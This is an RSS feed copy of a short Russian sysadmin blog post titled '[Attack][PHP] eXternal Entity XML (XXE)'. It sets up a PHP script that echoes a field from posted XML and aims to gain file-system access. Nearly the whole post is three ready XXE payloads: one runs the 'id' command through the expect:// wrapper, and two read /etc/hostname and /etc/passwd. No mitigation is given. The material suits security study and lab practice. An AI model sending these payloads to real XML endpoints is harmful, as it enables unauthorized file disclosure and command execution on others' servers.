Архивы XML - Заметки Эникейщика https://7d3.ru/wiki/tag/xml Или Рутинная Работа Системного Администратора Fri, 03 Apr 2020 06:18:30 +0000 ru-RU hourly 1 https://wordpress.org/?v=6.9.5 [Attack][PHP] eXternal Entity XML (XXE) https://7d3.ru/wiki/1090 https://7d3.ru/wiki/1090#respond Fri, 03 Apr 2020 06:16:55 +0000 https://7d3.ru/?p=1090 Вводная: скрипт PHP принимает параметр в виде XML методом POST и возвращает значение переменной name [crayon-6a7122a6ededd116900664/] Задача: Получить доступ к файловой системе. Решение: Определить какое из полей возвращает скрипт. Отправить POST-запрос: [crayon-6a7122a6edeeb004807847/] [crayon-6a7122a6edeef963589823/] [crayon-6a7122a6edef2130280247/] https://habr.com/ru/company/vds/blog/454614/ https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

Сообщение [Attack][PHP] eXternal Entity XML (XXE) появились сначала на Заметки Эникейщика.

]]>
Вводная: скрипт PHP принимает параметр в виде XML методом POST и возвращает значение переменной name

<form><name>Petr</name><phone>123123123</phone><csrf_token>HtidPUjEN2TVxe8LIgrs1MYm4y7kf69uRBQabnX3p5zFJOwqZcGolvAKSh0</csrf_token></form>

Задача: Получить доступ к файловой системе.

Решение: Определить какое из полей возвращает скрипт. Отправить POST-запрос:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe 'expect://id' >]>
<form><name>&xxe;</name><phone>123123123</phone><csrf_token>HtidPUjEN2TVxe8LIgrs1MYm4y7kf69uRBQabnX3p5zFJOwqZcGolvAKSh0</csrf_token></form>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM '/etc/hostname' >]>
<form><name>&xxe;</name><phone>123123123</phone><csrf_token>HtidPUjEN2TVxe8LIgrs1MYm4y7kf69uRBQabnX3p5zFJOwqZcGolvAKSh0</csrf_token></form>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>
<form><name>&xxe;</name><phone>&xxe;</phone><csrf_token>HtidPUjEN2TVxe8LIgrs1MYm4y7kf69uRBQabnX3p5zFJOwqZcGolvAKSh0</csrf_token></form>

https://habr.com/ru/company/vds/blog/454614/
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

Сообщение [Attack][PHP] eXternal Entity XML (XXE) появились сначала на Заметки Эникейщика.

]]>
https://7d3.ru/wiki/1090/feed 0